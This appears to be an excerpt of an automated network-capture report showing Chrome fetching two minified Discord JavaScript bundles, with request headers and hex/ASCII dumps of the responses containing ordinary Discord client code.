                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 75 2e 68 61 73 28 72 2e 6d 65 73 73 61 67 65 49 64 2c 21 31 29 29 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 41 44 5f 4d 45 53 53 41 47 45 53 5f 53 55 43 43 45 53 53 5f 43 41 43 48 45 44 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 66 6f 63 75 73 3a 72 2c 6c 69 6d 69 74 3a 6c 2c 74 72 75 6e 63 61 74 65 3a 64 7d 29 2c 21 30 3b 73 3d 7b 2e 2e 2e 72 7d 7d 6c 65 74 20 65 3d 28 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 6d 65 73 73 61 67 65 49 64 29 21 3d 6e 75 6c 6c 3f 65 73 2e 64 65 66 61 75 6c 74 2e 65 78 74 72 61 63 74 54 69 6d 65 73 74 61 6d 70 28 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 6d 65 73 73 61 67 65 49 64 29 3a 30 2c 6e 3d 75 2e 66 69 72 73 74 28 29 2c 61 3d 75 2e 6c
                                                                          Data Ascii: (u.has(r.messageId,!1))return i.default.dispatch({type:"LOAD_MESSAGES_SUCCESS_CACHED",channelId:t,focus:r,limit:l,truncate:d}),!0;s={...r}}let e=(null==s?void 0:s.messageId)!=null?es.default.extractTimestamp(null==s?void 0:s.messageId):0,n=u.first(),a=u.l


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          254192.168.2.549989162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/72870.d7e30a37a080f43af084.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
                                                                          2023-12-10 16:45:12 UTC973INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 31 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 35 65 64 38 37 39 61 62 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 29130Connection: closeCF-Ray: 8336f4f5ed879abf-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC396INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 38 37 30 22 5d 2c 7b 33 37 35 38 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 2c 69 2c 6e 2c 72 2c 75 2c 73 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 48 65 61 64 65 72 52 65 63 6f 72 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 46 69 6e 64 52 65 73 75 6c 74 44 69 72 65 63 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 41 75 74 6f 63 6f 6d 70 6c 65 74 65 72 52 65 73 75 6c 74 54 79 70 65 73 3a 66 75 6e 63 74 69 6f
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72870"],{375822:function(e,t,l){"use strict";var a,i,n,r,u,s;l.r(t),l.d(t,{HeaderRecord:function(){return o},FindResultDirections:function(){return a},AutocompleterResultTypes:functio
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 57 4e 22 2c 28 75 3d 69 7c 7c 28 69 3d 7b 7d 29 29 2e 47 55 49 4c 44 3d 22 47 55 49 4c 44 22 2c 75 2e 54 45 58 54 5f 43 48 41 4e 4e 45 4c 3d 22 54 45 58 54 5f 43 48 41 4e 4e 45 4c 22 2c 75 2e 47 52 4f 55 50 5f 44 4d 3d 22 47 52 4f 55 50 5f 44 4d 22 2c 75 2e 56 4f 49 43 45 5f 43 48 41 4e 4e 45 4c 3d 22 56 4f 49 43 45 5f 43 48 41 4e 4e 45 4c 22 2c 75 2e 55 53 45 52 3d 22 55 53 45 52 22 2c 75 2e 48 45 41 44 45 52 3d 22 48 45 41 44 45 52 22 2c 75 2e 41 50 50 4c 49 43 41 54 49 4f 4e 3d 22 41 50 50 4c 49 43 41 54 49 4f 4e 22 2c 75 2e 53 4b 55 3d 22 53 4b 55 22 2c 75 2e 4c 49 4e 4b 3d 22 4c 49 4e 4b 22 2c 28 73 3d 6e 7c 7c 28 6e 3d 7b 7d 29 29 2e 55 53 45 52 3d 22 40 22 2c 73 2e 54 45 58 54 5f 43 48 41 4e 4e 45 4c 3d 22 23 22 2c 73 2e 56 4f 49 43 45 5f 43 48 41
                                                                          Data Ascii: WN",(u=i||(i={})).GUILD="GUILD",u.TEXT_CHANNEL="TEXT_CHANNEL",u.GROUP_DM="GROUP_DM",u.VOICE_CHANNEL="VOICE_CHANNEL",u.USER="USER",u.HEADER="HEADER",u.APPLICATION="APPLICATION",u.SKU="SKU",u.LINK="LINK",(s=n||(n={})).USER="@",s.TEXT_CHANNEL="#",s.VOICE_CHA
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 22 22 2c 66 3d 6e 75 6c 6c 21 3d 3d 28 73 3d 6e 75 6c 6c 21 3d 3d 28 75 3d 65 2e 73 6f 72 74 61 62 6c 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 75 3f 75 3a 6e 75 6c 6c 3d 3d 3d 28 61 3d 74 2e 63 6f 6d 70 61 72 61 74 6f 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 22 22 3b 72 65 74 75 72 6e 20 64 3c 66 3f 2d 31 3a 64 3e 66 3f 31 3a 30 7d 7d 2c 38 36 30 32 38 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c
                                                                          Data Ascii: ==l?void 0:l.toLocaleLowerCase())&&void 0!==r?r:"",f=null!==(s=null!==(u=e.sortable)&&void 0!==u?u:null===(a=t.comparator)||void 0===a?void 0:a.toLocaleLowerCase())&&void 0!==s?s:"";return d<f?-1:d>f?1:0}},860285:function(e,t,l){"use strict";l.r(t),l.d(t,
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 75 72 65 73 2e 47 55 49 4c 44 5f 4f 4e 42 4f 41 52 44 49 4e 47 5f 48 41 53 5f 50 52 4f 4d 50 54 53 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 74 3d 69 2e 64 65 66 61 75 6c 74 2e 69 73 46 75 6c 6c 53 65 72 76 65 72 50 72 65 76 69 65 77 28 65 2e 69 64 29 2c 6c 3d 69 2e 64 65 66 61 75 6c 74 2e 69 73 4f 6e 62 6f 61 72 64 69 6e 67 45 6e 61 62 6c 65 64 28 65 2e 69 64 29 3b 72 65 74 75 72 6e 20 74 26 26 6c 7c 7c 65 2e 68 61 73 46 65 61 74 75 72 65 28 6e 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 47 55 49 4c 44 5f 4f 4e 42 4f 41 52 44 49 4e 47 5f 48 41 53 5f 50 52 4f 4d 50 54 53 29 7d 7d 2c 35 37 37 34 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72
                                                                          Data Ascii: ures.GUILD_ONBOARDING_HAS_PROMPTS))}function u(e){if(null==e)return!1;let t=i.default.isFullServerPreview(e.id),l=i.default.isOnboardingEnabled(e.id);return t&&l||e.hasFeature(n.GuildFeatures.GUILD_ONBOARDING_HAS_PROMPTS)}},577427:function(e,t,l){"use str
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 64 53 68 6f 77 49 6e 4c 69 62 72 61 72 79 29 29 2c 71 3d 28 30 2c 5f 2e 63 61 63 68 65 64 46 75 6e 63 74 69 6f 6e 29 28 65 3d 3e 65 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 75 6c 6c 21 3d 65 2e 6c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 26 26 6d 2e 64 65 66 61 75 6c 74 2e 69 73 4c 61 75 6e 63 68 61 62 6c 65 28 65 2e 6c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 69 64 2c 65 2e 6c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 62 72 61 6e 63 68 49 64 29 29 29 2c 48 3d 28 30 2c 5f 2e 63 61 63 68 65 64 46 75 6e 63 74 69 6f 6e 29 28 28 65 2c 74 29 3d 3e 65 2e 66 69 6c 74 65 72 28 65 3d 3e 69 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29
                                                                          Data Ascii: dShowInLibrary)),q=(0,_.cachedFunction)(e=>e.filter(e=>null!=e.libraryApplication&&m.default.isLaunchable(e.libraryApplication.id,e.libraryApplication.branchId))),H=(0,_.cachedFunction)((e,t)=>e.filter(e=>i(t.toLowerCase(),e.application.name.toLowerCase()
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 61 6e 63 68 49 64 29 2c 69 73 4e 65 77 3a 28 6e 3d 65 2c 72 3d 6f 2c 6e 75 6c 6c 21 3d 6e 26 26 73 28 6e 2e 63 72 65 61 74 65 64 41 74 29 2e 69 73 41 66 74 65 72 28 4d 29 26 26 30 3d 3d 3d 72 29 2c 69 73 4c 61 75 6e 63 68 69 6e 67 3a 66 2e 64 65 66 61 75 6c 74 2e 6c 61 75 6e 63 68 69 6e 67 47 61 6d 65 73 2e 68 61 73 28 65 2e 69 64 29 2c 69 73 52 75 6e 6e 69 6e 67 3a 61 2e 68 61 73 28 65 2e 69 64 29 2c 69 73 4c 61 75 6e 63 68 61 62 6c 65 3a 28 30 2c 76 2e 69 73 4c 61 75 6e 63 68 61 62 6c 65 29 28 7b 4c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 53 74 6f 72 65 3a 41 2e 64 65 66 61 75 6c 74 2c 4c 61 75 6e 63 68 61 62 6c 65 47 61 6d 65 53 74 6f 72 65 3a 66 2e 64 65 66 61 75 6c 74 2c 44 69 73 70 61 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 74 6f 72
                                                                          Data Ascii: anchId),isNew:(n=e,r=o,null!=n&&s(n.createdAt).isAfter(M)&&0===r),isLaunching:f.default.launchingGames.has(e.id),isRunning:a.has(e.id),isLaunchable:(0,v.isLaunchable)({LibraryApplicationStore:A.default,LaunchableGameStore:f.default,DispatchApplicationStor
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 79 73 74 65 6d 54 72 61 79 41 70 70 6c 69 63 61 74 69 6f 6e 73 28 71 28 47 29 2e 6d 61 70 28 65 3d 3e 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 29 2e 73 6c 69 63 65 28 30 2c 35 29 29 2c 21 30 29 7d 63 6c 61 73 73 20 59 20 65 78 74 65 6e 64 73 20 6f 2e 64 65 66 61 75 6c 74 2e 53 74 6f 72 65 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 74 68 69 73 2e 73 79 6e 63 57 69 74 68 28 5b 64 2e 64 65 66 61 75 6c 74 2c 45 2e 64 65 66 61 75 6c 74 2c 66 2e 64 65 66 61 75 6c 74 2c 4c 2e 64 65 66 61 75 6c 74 2c 6d 2e 64 65 66 61 75 6c 74 2c 53 2e 64 65 66 61 75 6c 74 2c 41 2e 64 65 66 61 75 6c 74 2c 79 2e 64 65 66 61 75 6c 74 2c 67 2e 64 65 66 61 75 6c 74 2c 68 2e 64 65 66 61 75 6c 74 5d 2c 4b 2c 32 30 30 29 2c 74 68 69 73 2e 73 79 6e 63 57 69 74 68 28 5b 43 2e 64 65 66 61 75
                                                                          Data Ascii: ystemTrayApplications(q(G).map(e=>e.application).slice(0,5)),!0)}class Y extends o.default.Store{initialize(){this.syncWith([d.default,E.default,f.default,L.default,m.default,S.default,A.default,y.default,g.default,h.default],K,200),this.syncWith([C.defau
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 65 73 2e 55 50 44 41 54 45 5f 52 45 51 55 49 52 45 44 3a 72 65 74 75 72 6e 20 69 2e 4c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 41 63 74 69 6f 6e 73 2e 55 50 44 41 54 45 7d 73 77 69 74 63 68 28 6e 2e 74 79 70 65 29 7b 63 61 73 65 20 69 2e 4c 6f 63 61 6c 44 69 73 70 61 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 74 61 74 65 73 2e 49 4e 53 54 41 4c 4c 49 4e 47 3a 63 61 73 65 20 69 2e 4c 6f 63 61 6c 44 69 73 70 61 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 74 61 74 65 73 2e 55 50 44 41 54 49 4e 47 3a 63 61 73 65 20 69 2e 4c 6f 63 61 6c 44 69 73 70 61 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 74 61 74 65 73 2e 55 50 44 41 54 45 5f 52 45 51 55 49 52 45 44 3a 63 61 73 65 20 69 2e 4c 6f 63 61 6c 44 69 73 70 61 74 63 68 41 70 70 6c 69 63 61 74 69
                                                                          Data Ascii: es.UPDATE_REQUIRED:return i.LibraryApplicationActions.UPDATE}switch(n.type){case i.LocalDispatchApplicationStates.INSTALLING:case i.LocalDispatchApplicationStates.UPDATING:case i.LocalDispatchApplicationStates.UPDATE_REQUIRED:case i.LocalDispatchApplicati
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 42 4c 45 5f 53 4f 52 54 5f 55 50 44 41 54 45 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 64 69 72 65 63 74 69 6f 6e 3a 74 2c 6b 65 79 3a 6c 7d 3d 65 3b 64 3d 74 2c 66 3d 6c 2c 75 2e 64 65 66 61 75 6c 74 2e 73 65 74 28 63 2c 7b 73 6f 72 74 44 69 72 65 63 74 69 6f 6e 3a 64 2c 73 6f 72 74 4b 65 79 3a 66 7d 29 7d 2c 4c 49 42 52 41 52 59 5f 54 41 42 4c 45 5f 41 43 54 49 56 45 5f 52 4f 57 5f 49 44 5f 55 50 44 41 54 45 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 6b 65 79 3a 74 2c 69 73 4b 65 79 62 6f 61 72 64 45 76 65 6e 74 3a 6c 7d 3d 65 3b 6c 26 26 28 70 3d 21 30 2c 68 28 29 29 2c 61 3d 74 7d 7d 29 3b 76 61 72 20 4c 3d 41 7d 2c 32 35 32 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 65 74 20 61
                                                                          Data Ascii: BLE_SORT_UPDATE:function(e){let{direction:t,key:l}=e;d=t,f=l,u.default.set(c,{sortDirection:d,sortKey:f})},LIBRARY_TABLE_ACTIVE_ROW_ID_UPDATE:function(e){let{key:t,isKeyboardEvent:l}=e;l&&(p=!0,h()),a=t}});var L=A},25292:function(e,t,l){"use strict";let a


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          255192.168.2.549990162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/83554.2a246a1047818167dc16.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
                                                                          2023-12-10 16:45:12 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 37 38 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 36 62 39 35 37 33 33 35 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 27786Connection: closeCF-Ray: 8336f4f6b957335f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 33 35 35 34 22 5d 2c 7b 31 37 39 39 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 66 65 74 63 68 52 65 66 65 72 72 61 6c 73 52 65 6d 61 69 6e 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 63 68 65 63 6b 52 65 63 69 70 69 65 6e 74 45 6c 69 67 69 62 69 6c 69 74 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 63 72 65 61 74 65 52 65 66 65 72 72 61 6c 54 72 69 61 6c 3a 66 75 6e 63
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["83554"],{179935:function(e,t,r){"use strict";r.r(t),r.d(t,{fetchReferralsRemaining:function(){return C},checkRecipientEligibility:function(){return a},createReferralTrial:func
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 72 65 73 6f 6c 76 65 52 65 66 65 72 72 61 6c 54 72 69 61 6c 4f 66 66 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 22 38 37 32 37 31 37 22 29 2c 6e 3d 72 28 22 39 31 33 31 34 34 22 29 2c 69 3d 72 28 22 38 31 39 36 38 39 22 29 2c 75 3d 72 28 22 31 38 34 39 34 22 29 2c 73 3d 72 28 22 34 39 31 31 31 22 29 3b 6c 65 74 20 43 3d 28 29 3d 3e 28 6e 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 52 45 46 45 52 52 41 4c 53 5f 52 45 4d 41 49 4e 49 4e 47 5f 46 45 54 43 48 5f 53 54 41 52 54 22 7d 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 73 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 45 54 5f 52 45
                                                                          Data Ascii: tion(){return f},resolveReferralTrialOffer:function(){return _}});var l=r("872717"),n=r("913144"),i=r("819689"),u=r("18494"),s=r("49111");let C=()=>(n.default.dispatch({type:"BILLING_REFERRALS_REMAINING_FETCH_START"}),l.default.get({url:s.Endpoints.GET_RE
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 56 41 4c 49 44 5f 4d 45 53 53 41 47 45 5f 53 45 4e 44 5f 55 53 45 52 29 7b 6c 65 74 20 74 3d 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 6c 79 53 65 6c 65 63 74 65 64 43 68 61 6e 6e 65 6c 49 64 28 29 3b 6e 75 6c 6c 21 3d 74 26 26 69 2e 64 65 66 61 75 6c 74 2e 73 65 6e 64 43 6c 79 64 65 45 72 72 6f 72 28 74 2c 65 2e 62 6f 64 79 2e 63 6f 64 65 29 7d 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3b 6c 65 74 20 72 3d 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 73 2e 45 6e 64 70 6f 69 6e 74 73 2e 52 45 46 45 52 52 41 4c 5f 4f 46 46 45 52 5f 49 44 5f 52 45 53 4f 4c 56 45 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 69 3d 6e 75 6c 6c 21 3d 3d 28
                                                                          Data Ascii: VALID_MESSAGE_SEND_USER){let t=u.default.getCurrentlySelectedChannelId();null!=t&&i.default.sendClydeError(t,e.body.code)}}}async function _(e){try{var t;let r=await l.default.get({url:s.Endpoints.REFERRAL_OFFER_ID_RESOLVE(e),oldFormErrors:!0}),i=null!==(
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 29 2c 6e 75 6c 6c 3d 3d 5f 3f 5b 5d 3a 5f 7d 69 73 46 65 74 63 68 69 6e 67 52 65 66 65 72 72 61 6c 73 52 65 6d 61 69 6e 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 45 7d 69 73 46 65 74 63 68 69 6e 67 52 65 63 69 70 69 65 6e 74 45 6c 69 67 69 62 69 6c 69 74 79 28 65 29 7b 72 65 74 75 72 6e 20 4c 2e 68 61 73 28 65 29 7d 67 65 74 52 65 63 69 70 69 65 6e 74 45 6c 69 67 69 62 69 6c 69 74 79 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 66 5b 65 5d 26 26 21 4c 2e 68 61 73 28 65 29 26 26 28 30 2c 73 2e 63 68 65 63 6b 52 65 63 69 70 69 65 6e 74 45 6c 69 67 69 62 69 6c 69 74 79 29 28 65 29 2c 66 5b 65 5d 7d 67 65 74 52 65 6c 65 76 61 6e 74 55 73 65 72 54 72 69 61 6c 4f 66 66 65 72 28 65 29 7b 72 65 74 75 72 6e 20 6f 5b 65 5d 7d 69 73 52 65 73 6f 6c 76 69
                                                                          Data Ascii: ),null==_?[]:_}isFetchingReferralsRemaining(){return E}isFetchingRecipientEligibility(e){return L.has(e)}getRecipientEligibility(e){return void 0===f[e]&&!L.has(e)&&(0,s.checkRecipientEligibility)(e),f[e]}getRelevantUserTrialOffer(e){return o[e]}isResolvi
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 7d 3d 65 3b 6e 75 6c 6c 21 3d 74 26 26 28 64 2e 64 65 6c 65 74 65 28 74 2e 69 64 29 2c 52 2e 61 64 64 28 74 2e 69 64 29 2c 6f 5b 74 2e 69 64 5d 3d 74 29 7d 2c 42 49 4c 4c 49 4e 47 5f 52 45 46 45 52 52 41 4c 5f 52 45 53 4f 4c 56 45 5f 46 41 49 4c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 75 73 65 72 54 72 69 61 6c 4f 66 66 65 72 49 64 3a 74 7d 3d 65 3b 64 2e 64 65 6c 65 74 65 28 74 29 2c 52 2e 61 64 64 28 74 29 7d 2c 4c 4f 41 44 5f 4d 45 53 53 41 47 45 53 5f 53 55 43 43 45 53 53 3a 4f 2c 4d 45 53 53 41 47 45 5f 43 52 45 41 54 45 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 6d 65 73 73 61 67 65 3a 74 7d 3d 65 3b 41 28 74 29 7d 2c 4c 4f 41 44 5f 4d 45 53 53 41 47 45 53 5f 41 52 4f 55 4e 44 5f 53 55 43 43 45 53 53 3a 4f 2c 4c 4f 47 4f 55 54 3a
                                                                          Data Ascii: }=e;null!=t&&(d.delete(t.id),R.add(t.id),o[t.id]=t)},BILLING_REFERRAL_RESOLVE_FAIL:function(e){let{userTrialOfferId:t}=e;d.delete(t),R.add(t)},LOAD_MESSAGES_SUCCESS:O,MESSAGE_CREATE:function(e){let{message:t}=e;A(t)},LOAD_MESSAGES_AROUND_SUCCESS:O,LOGOUT:
